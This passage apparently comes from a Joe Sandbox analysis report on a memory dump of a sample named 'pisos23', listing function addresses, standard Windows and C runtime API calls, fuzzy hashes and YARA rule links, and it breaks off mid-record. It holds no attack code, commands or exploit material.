Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c9afc543761c1e4457cd21285bcd932a44b77833f60d9aa1bf3080f7552eef8
Instruction ID: 83140be41554bccc80b22af3b5bf0e40199f1bab67d6f1c1b306e2b6b2516aed
Opcode Fuzzy Hash: 7c9afc543761c1e4457cd21285bcd932a44b77833f60d9aa1bf3080f7552eef8
Instruction Fuzzy Hash: 43B1B170A04245ABDB15DF98C881BEE7BF5FF49310F9441D8E86597292CB70D9C2CB91

Function 00B1FA0D Relevance: 4.7, APIs: 3, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__freea.LIBCMT ref: 00B1FBC2

Part of subcall function 00B1AA66: RtlAllocateHeap.NTDLL(00000000,00B19D07,?,?,00B19D07,00000220,?,?,?), ref: 00B1AA98

__freea.LIBCMT ref: 00B1FBD5
__freea.LIBCMT ref: 00B1FBE2

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: __freea$AllocateHeap
String ID:
API String ID: 2243444508-0
Opcode ID: 7a2735ab0b55574055d2d07c93f524eb0d6037fe16b666ec221460acd59b01af
Instruction ID: fe18a7f2ec6ced2b0cb72d53934dd312b6f76464682e34c21ef1548b81019385
Opcode Fuzzy Hash: 7a2735ab0b55574055d2d07c93f524eb0d6037fe16b666ec221460acd59b01af
Instruction Fuzzy Hash: 4151E37260820BAFDB209F65CC91EFB7AE9EF44714BA500B9FD08D6141EB34DC91C661

Function 00B1FD65 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B2010F: GetConsoleOutputCP.KERNEL32(C5FEAF00,00000000,00000000,?), ref: 00B20172

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00B13BA2,?,00B13E04,wn e), ref: 00B1FEEA
GetLastError.KERNEL32(?,00B13BA2,?,00B13E04,wn e,00B13E04,?,?,?,65636375,00B2BBF4,DF7D7950,65636375,65206E77,?,?), ref: 00B1FEF4

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 799d5405d4e5b15cddaf4fc9dfa476823ea3a4e55305ae00a7c4b390147e8bb3
Instruction ID: ffc5880ba1bd1fcfa1197bb53129681a5ac38b14cf3a373f8302e6e19017c38e
Opcode Fuzzy Hash: 799d5405d4e5b15cddaf4fc9dfa476823ea3a4e55305ae00a7c4b390147e8bb3
Instruction Fuzzy Hash: 4961B172D0411AAFDF11DFA8D884AFEBBF9EF09314F5401A5E804A7252D771D982CBA0

Function 00B1993A Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B19B3F: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00B19B6A

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00B19D4A,?,00000000,?,?,?), ref: 00B1999B
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B19D4A,?,00000000,?,?,?), ref: 00B199D7

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: a5f6204a333f4bdb3c0f04802adb10a54bd20694f031031c6eb22b6f548b27a8
Instruction ID: 2ca3078cd429bdb3beb0ffd178fffe6094914f1c1e666cca638c0b7f81a3b35e
Opcode Fuzzy Hash: a5f6204a333f4bdb3c0f04802adb10a54bd20694f031031c6eb22b6f548b27a8
Instruction Fuzzy Hash: 39513671A042859EDB21CF35C8A16FFBBF4EF51300F9845EED0868B251D774AA8ACB40

Function 00B0FF46 Relevance: 3.1, APIs: 2, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B11398
___raise_securityfailure.LIBCMT ref: 00B11480

Part of subcall function 00B123BC: RaiseException.KERNEL32(E06D7363,00000001,00000003,00B2F8FC,0FE5E46C,E830C8A9,00A80CC6,?,00B2F8FC,?,?,484CB9CD,E830C8A9,000AB9E4,00A8C807,?), ref: 00B1241C

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
String ID:
API String ID: 3749517692-0
Opcode ID: 087fed525c308372478bcf9eaba997f1052ee6ffdcf6f7c6e41965a4772bf182
Instruction ID: a19b9b45ab54892143a30889039fe9383528153809e936dc65eb352dcbff8a8c
Opcode Fuzzy Hash: 087fed525c308372478bcf9eaba997f1052ee6ffdcf6f7c6e41965a4772bf182
Instruction Fuzzy Hash: 88315B75510305AFC714EF54F88669C3BE8FB09710F6445AAEA08C76E1EFB0A985CB84

Function 00B2053E Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00B1FED0,?,00B13E04,?,?,?,00000000), ref: 00B205DA
GetLastError.KERNEL32(?,00B1FED0,?,00B13E04,?,?,?,00000000,?,?,?,?,?,00B13BA2,?,00B13E04), ref: 00B20600

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: e86b2925cb5295336ed2ca84300af8358c613986ab564a6fe0bb7e9a74f2b1b1
Instruction ID: 56f7d5369a5facfa920d215328b9a1beea1e314bf7751b14c9627230c9ff07e4
Opcode Fuzzy Hash: e86b2925cb5295336ed2ca84300af8358c613986ab564a6fe0bb7e9a74f2b1b1
Instruction Fuzzy Hash: 66215135A102299FCF16DF29DD809E9B7F6EB59301F1441E9E949D7212D630AD428F60

Function 00B1F4DF Relevance: 3.1, APIs: 2, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000002,?,00000000,?,?,?,00B1F397,00000000,?,?,00000002,00000000), ref: 00B1F51B
GetLastError.KERNEL32(00000000,?,00B1F397,00000000,?,?,00000002,00000000,?,00B1FE0A,?,00000000,00000000,00000002,?,?), ref: 00B1F528

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: bbf58d51f37d4260e24730a8b6f6c2b5e818863d2645a477edb3d9bd3cabb5f8
Instruction ID: 288b5ff029eca90531ea6022095194c0c96c7021124ab42b54ea6c63436aadf5
Opcode Fuzzy Hash: bbf58d51f37d4260e24730a8b6f6c2b5e818863d2645a477edb3d9bd3cabb5f8
Instruction Fuzzy Hash: AF014E32610146EFCF05CF59DC05CEE3B66EF91334B640194F8119B190EA71ED81CB90

Function 00B18D6C Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00B1FAFD,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00B18DA0
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00B1FAFD,?,?,-00000008,?,00000000), ref: 00B18DBE

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: bc2cdc1acb1ef2ad02b4a41ef5be3eeec1031a669ad62285009266dfa6db57cf
Instruction ID: 1ffd754b3b21c3d4ebfb2864a57e769eff3ffa2661760902f51e09621f4f3826
Opcode Fuzzy Hash: bc2cdc1acb1ef2ad02b4a41ef5be3eeec1031a669ad62285009266dfa6db57cf
Instruction Fuzzy Hash: 89F09D3640021ABBCF125F90EC05DDE3FA6FF58760F058064FA1865170CB32C8B2AB90

Function 00B1DE86 Relevance: 2.6, APIs: 2, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,00B1E014,00000000,CF830579,00B30170,0000000C,00B1DF9C,00B16A0B,?), ref: 00B1DEDC
GetLastError.KERNEL32(?,00B1E014,00000000,CF830579,00B30170,0000000C,00B1DF9C,00B16A0B,?), ref: 00B1DEE6

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 021d03b542d3781408f05e4ea38f25b870b0d0c8578ca691f02420d36a1f04fa
Instruction ID: 1cfc4d76624dfb14d08dc3211fe816cd3f1ad1aa11b1e81a743a1974655b5a0d
Opcode Fuzzy Hash: 021d03b542d3781408f05e4ea38f25b870b0d0c8578ca691f02420d36a1f04fa
Instruction Fuzzy Hash: B01108336182605ADA25A734A8467FE77C9CF92735FA502D9F9198F1D2DE319CC18250

Function 00B1761C Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2641b05ab42e279e6d6000364e597d4e12bcd8e2bc449f4f06e5078326b227c2
Instruction ID: 737c9b585a5b46f3ec52fed16b46950b2a5787c1d782dd9986e164c760ec2aca
Opcode Fuzzy Hash: 2641b05ab42e279e6d6000364e597d4e12bcd8e2bc449f4f06e5078326b227c2
Instruction Fuzzy Hash: 8651C374A44204AFDB15DF58C881EE97BF1EF49324FA48198F8089B392DB319E81CB90

Function 00B19EC9 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(00000083,?,00000005,00B19D4A,?), ref: 00B19EFB

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 4070eb77de87a66341f22e465dccc7f195f0d357b81042e1863261f3ee89b235
Instruction ID: e714d5a3f41af5bac1671a0858243602fdabcb3bed0fec4506ebc9ccd0339c3c
Opcode Fuzzy Hash: 4070eb77de87a66341f22e465dccc7f195f0d357b81042e1863261f3ee89b235
Instruction Fuzzy Hash: 445119B1908198AADB118F28CDD4BE9BBEDEB15304F5401F9E559C7182C375BEC6CB60

Function 00B1E1C0 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 00B1E319

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: cbbe9fb4ddf00cd92ba281f185635d4fe31687558056382b6614f77fb2f79f20
Instruction ID: c2715596473616f8003d6afb6ca76a6a39287c3820b698074e938d6006f57ac6
Opcode Fuzzy Hash: cbbe9fb4ddf00cd92ba281f185635d4fe31687558056382b6614f77fb2f79f20
Instruction Fuzzy Hash: BD116A71A0420AAFCB05DF58E9419DF7BF9EF48304F1440A9F818AB301D671EE11CBA4

Function 00B1A91E Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00B192BF,00000001,00000364,00000002,000000FF,3A93E03C,00000000,?,00B139C5,00000000,?), ref: 00B1A95F

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 603c357df3655afde6df288533df208b2a06eddbae59bd6a2915a4dc7024fa28
Instruction ID: dcc67438c3f6f7767e323051fab48d56e62201bf056b211ee5b376021dcfce78
Opcode Fuzzy Hash: 603c357df3655afde6df288533df208b2a06eddbae59bd6a2915a4dc7024fa28
Instruction Fuzzy Hash: A3F0BB31542625A79B216A629C05BDB37D8EF81BF0F9680E1A808A7080DA20FCC186E2

Function 00B1AA66 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00B19D07,?,?,00B19D07,00000220,?,?,?), ref: 00B1AA98

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3a02ef84e22de5449615367b9fdcc8aa4094228b13c65c7e492beede8df4d5c7
Instruction ID: 126e01bbad70971eed9c1bc433b47386beef0164c42f2b1a6ab964ef2ed5a024
Opcode Fuzzy Hash: 3a02ef84e22de5449615367b9fdcc8aa4094228b13c65c7e492beede8df4d5c7
Instruction Fuzzy Hash: 2CE030212526259BDB3126659D01BEF76D8DF457A0FA501E1BD05960D2DB24BC81C1A2

Function 00B23A7C Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00B23720,?,?,00000000,?,00B23720,00000000,0000000C), ref: 00B23A99

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f41d5371d6e9beb5070d533eae0070dee1b6e8ef8ffaccc1e815d6340bf5c54c
Instruction ID: 37aa99c7369e132a967d080acb31af292c8d2c4d51d86a4eb5838ddfec667ea4
Opcode Fuzzy Hash: f41d5371d6e9beb5070d533eae0070dee1b6e8ef8ffaccc1e815d6340bf5c54c
Instruction Fuzzy Hash: 32D06C3600010DBBDF128F84DD06EDA3BAAFB48714F014010BA1856020C732E822AB94

Non-executed Functions

Function 00AA8400 Relevance: 21.5, APIs: 2, Strings: 10, Instructions: 485COMMON

Download Yara Rule

Strings

m0S, xrefs: 00AA85B1
4&7w, xrefs: 00AA87D8
1`YV, xrefs: 00AA8591
m0S, xrefs: 00AA8677
4&7w, xrefs: 00AA886B
4&7w, xrefs: 00AA8860
4&7w, xrefs: 00AA84C3
m0S, xrefs: 00AA8641
0`YV, xrefs: 00AA84A2
1`YV, xrefs: 00AA84AD

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID:
String ID: 0`YV$1`YV$1`YV$4&7w$4&7w$4&7w$4&7w$m0S$m0S$m0S
API String ID: 0-2157229965
Opcode ID: dd55e2c43ce5c745a7c0b9cf489d567d68bee2c70d0703bc131cf435ece724d7
Instruction ID: 4187d21b395290044b177f90fbe86978f9ab1d3c83f5d102dddab1cfb66d34e3
Opcode Fuzzy Hash: dd55e2c43ce5c745a7c0b9cf489d567d68bee2c70d0703bc131cf435ece724d7
Instruction Fuzzy Hash: 67E16B37B122028B9B288A285C956BF7BD3ABC6354F39C916D416C72D4DF3DCC869742

Function 00AD9A90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

8fOh, xrefs: 00AD9B07
9fOh, xrefs: 00AD9B24
9fOh, xrefs: 00AD9D82

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
